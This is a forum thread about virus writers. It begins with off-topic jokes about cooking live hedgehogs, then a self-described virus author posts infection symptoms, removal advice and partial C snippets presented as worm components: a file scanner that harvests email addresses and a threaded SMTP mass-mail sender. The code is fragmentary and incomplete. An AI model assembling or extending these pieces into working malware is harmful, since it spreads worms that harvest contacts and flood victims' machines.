Stopping a Virus Writer

[jinxy]

Can you eat them?

Yes smoother them with clay and dump in a fire to bake. After a suitable cook time remove from fire. Break open the clayball. The spines should stay attached to the clay leaving you with some cooked meat. By the way, there was, a few years back a hedhog flavoured crisp on the market over hear. Not real just a gimick.

[foxyloxley]

After a suitable cook time

You've got to let them stop SQUEALING first

[Egaladeist]

Hi DjM,

A hedgehog is one of those little creatures that rolls up into a ball to daffle his enemies...a spiney ball kinda like velcro but with pins instead of velcro hooks...

Hi jinxy,

First you have to slice open the soft underbelly and remove the guts or the meat will get infected and taste nasty...other than that....Yummmmmmm! Anybody got a toothpick ! Do they have recipies on their website too?

Hi foxyloxley,

Geeeeezzzz!...that sounds soooooo cruel to cook it while it's still alive....you have to beat it unconscious first with a rock to tenderize it...then cook it ! Sheeeeeesh !


Eg

[codelogman]

I'm a older virus writter, and some for my virus don't run actually, but i don't understand for malicious virus writters who send a virus only for molest or appear in papers.

Basically this area is "vudu" for all coders, and i have interesting and exciting! Actually i write some and dangerous virus codes, the difference is i study that, i don't interest be famous.

Now, some virus propagation cause millions in lost for some some some enterprises, that is true? or is a leyend only.

Many AV enterprises take a virus for a good business, it is true, they send a hive ( virus egg) and infect millions of pc around the world two days later they release a removal tool ), when a independient virus coder send a hive, then he is persecute, ironic? yes.


Now with respect to the original post, and Tindala post, the problem reside onto kernell, the traditional AV don't detect this virus, why, simple: the code "delta" on the ZERO ring kernell level and the AV don't see that.

Some virus implement himself protocols like a tcp, like a smtp and others.


Diagnostic:

Lost of memory ( and virtual memory)
Low processing task
Malfunction in some kernell objects (freeze system and panic [under linuz])
Rare and don't listed port traffic (open ports etc)
A "idiot" or "suck.." bad intentioned messages on the screen (no system form objects)
lost of information ( encrypted data and corrupt files)
Dennied root acces or administrator (windows)
Dennied users acces


Solution:

in the pack of process:
- First: a traffic scanner
- Second:a memory scanner (background process and high objects registration) like a spy
-Third: a comercial AV

then, a expertise coder who use this tools and hunt the non-comecial virus.

Yes, this is only a idea, very difficult but this works only if you don't decide reinstall or recompile the bynaries for kernell system. Or reinstall the system (data server, web server etc)


What is it?

A difficult way, but the secure way for take off a rare no-comercial virus.



Saludos

[XxRealityxX]

firewalls and a/vs usually work, but if they come out with new ones everyday, how do we stop them? do..we merely learn from them? and send their attacks back at them? merely for defensive purposes of course. or do we let them keep attacking poor innocent people.? =(

[i2c]

Now, I couldnt be arsed reading the entire 7 pages (Sorry im wasted...) of this thread, but I was just wondering why you think he's writing them? could he not just be using a virus creation kit? - AV's will pick these up.

What does the "virus" do?

lalalala

i2c

[codelogman]

Originally posted here by i2c
Now, I couldnt be arsed reading the entire 7 pages (Sorry im wasted...) of this thread, but I was just wondering why you think he's writing them? could he not just be using a virus creation kit? - AV's will pick these up.

What does the "virus" do?

i2c

Yes, good question, i write a Creation Kit for polimorphic variants, assembler, c++ etc, but the problem with that is:

a virus writter is alone person, underground person, actually i don't. I consider myself for a newbie in virus writting. I learn day by day. But my point in this ask (my ask) is take a lot of my experience in virus creation, virus design for help. i don't say why i decide take this way, help for persons? anyway in the past, now i learn for take the live "happyness" . Suicidal boy? maybe but i learn for the "coding virus" that for malicious code is the wrong way, only i have the necesary weapons for live the obfuscated coding in peace and better.


You see, write a virus code is no a difficult task only you need know how the operating system works.

we have a piece of code:

a simple scanner

/\
< >
\/

Code:

char file_parser(const char *filename)
{
	HANDLE __file__; //operator HANDLE( ) const throw( ) rEturns the value of the stored handle (ALT)
	DWORD __offset__, __heap__, __finder__; //operator DWORD( ) const rEturns the cookie associated with the CComGITPtr object (ALT)
	char buf[65535]; // for take a lot of memoRy 

	__file__ = CreateFile(filename, FILE_SHARE_READ, FILE_SHARE_READ|FILE_SHARE_WRITE,
		NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED, NULL); // rEturns a handle that can be used to access the object
	if (__file__ == NULL || __file__ == INVALID_HANDLE_VALUE) return 1; // i donT need explaiN thiS
    //Like a linuz hd0 equal \\.\PHYSICALDRIVE0                  
	__heap__ = 0;
	__finder__ = 0;
	for (;;) { // wE dont't need run
		__offset__ = 0; // how we move how we ask onto buFFer  
		ReadFile(__file__, buf, sizeof(buf)-2, &__offset__, NULL); // WhY -2 for the first (no last) unsigned int
		if (__offset__ == 0 || __offset__ >= sizeof(buf)) break; 
		__heap__ += __offset__;
		buf[__offset__] = 0;

		scantext_textcvt(buf, __offset__); //search for "any" stuff do you WaNT
		__finder__ += scantext_extract_ats(buf, __offset__);

		if ((__finder__ == 0) && (__heap__ > (300*1024))) // really i want a any patrol, no a specific patrol, you see
			//if you take a moment for see .EXE and .dll (object) code you learn by the time why is a reall patrol in
			//some windows or linuz objects
			break;
	}
	CloseHandle(__file__); // close the "stream"
	return 0;
}


If you want send that for mail packets is very simple:

the difficult way:

// queueing for mail transfer packets

static DWORD _stdcall __doomkicker(LPVOID _flag)
{
	struct _MAILPROTOCOL_CLS *_MTQ = (struct _MAILPROTOCOL_CLS *)_flag;
	InterlockedIncrement(&mythread); // increments the value of the specified variable 
	if (_MTQ != NULL) {
		_MTQ->_state = 1;
		mmsender(_MTQ);
		_MTQ->_state = 2;
	}
	if (mythread > 0)
		InterlockedDecrement(&mythread); //mythread is the idle for asyncronous sender
	ExitThread(0); // <:)
	return 0; // zero determine the way for the thread heap
}

the _MAILPROTOCOL_CLS if you preffer..a simple dynamic list

#pragma pack(push, 1)
struct _MAILPROTOCOL_CLS {
	struct _MAILPROTOCOL_CLS *next;
	unsigned long tick_got;
	char _state;		
	char priority;		
	char to[1];
};


the easy way:

prototypes

#define BUFFER_DEFAULT_SIZE 4096

#define TIME_STAMP_YES 0
#define TIME_STAMP_NO 1
#define STR_VALUE 0
#define DW_VALUE 1
#define REG_BUFF 100


structures:

typedef struct
{
   char* ToAdd;
   char* FromAdd;
   char* Subject;
   char* MsgBody;
}SmtpMsg;

typedef struct
{
   char* address;
   int port;
}TCPServer;

static FILE *logFile;

char* getNowTime (void)
{
   struct tm *nowTime;
   time_t aclock;

   time (&aclock);
   nowTime = localtime (&aclock);

   return asctime(nowTime);
}


//principal module (sender)

bool sendData (const char* msg, SOCKET sockInUse, char* rcvBuff)
{
   const char* MSG;
   int ret;

   ZeroMemory (rcvBuff, BUFFER_DEFAULT_SIZE);
   MSG = msg;

   size_t msgLength;
   msgLength = strlen(MSG);

   send (sockInUse, MSG, msgLength, 0);
    ret = recv (sockInUse, rcvBuff, BUFFER_DEFAULT_SIZE, 0);

   if (ret != 0)
      if (ret == SOCKET_ERROR)
         printf("Connection to SMTP server is now OK" + WSAGetLastError());

    return true;
}


ZeroMemory:

The ZeroMemory macro fills a block of memory with zeros.

To avoid undesired effects of optimizing compilers, use the SecureZeroMemory function.


if you don't know what is the ZeroMemory prototype

void ZeroMemory(
  PVOID Destination,
  SIZE_T Length
);

Parameters
Destination 
[in] Pointer to the starting address of the block of memory to fill with zeros. 
Length 
[in] Size of the block of memory to fill with zeros, in bytes. 
Return Values
This function has no return value.

if you don't have idea for send is declared:

int PASCAL FAR send (
                     IN SOCKET s,
                     IN const char FAR * buf,
                     IN int len,
                     IN int flags);

part of winsock.h

Now, the virus creation need more coding, this is only the first way o any way, really i confused sometimes
what is the better way for attack a virus code (coding) the virus creation tools is the most simple way for
kids and childrens, I take a moment for write asm virus or C trojan horse, but i repeat:

The virus is a better way for learn?

I say yes, all of virus including is a "expertise" knowing for Operating Systems and hardware functionally..

I don't need morality for see malicious coders like a child molesters, that childrens is the future for the real
underground and professional coders. But, this childrens, like me (along time ago) need someone who teach the
only way: best softare, best operating systems (pleasseeee), best games and best persons (machines any..)


Saludos i2c and BesT WisheS

AzRaEL [NuKE]

/\
< >
\/

[i2c]

Yea interesting post, I understand the process of creation, any one that mucks about with code and OS's i believe has the knowledge to do some damaging things. I just wanted to learn more about this persons problem as he was very vague on details!

You seem like the majority of us here at AO, interested in "black arts" but to many morals to use them to cause harm...

Cheers for the post

i2c